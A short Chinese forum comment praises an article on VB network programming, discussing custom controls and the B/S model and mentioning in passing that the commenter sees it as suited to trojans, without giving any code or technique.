其实只要能实现相应的功能,没必要非要用VB去写.不过这篇文章对学习VB网络编程还是有帮助的,思路很好也有代码说明.其实关于控件只是给开发人员提供一些基本功能,节省开发时间用的,这也是为何有专业人士开发自己的控件(功能可自定且功能较强).当然要对系统底层知识比较了解.其中B/S模式思路说的比较不错(本人认为用在木马上),当然这已经流行很久了.文章讲了挺多其他方面的,总体来说网友各取所用吧,总之希望这样的帖子经常能看到

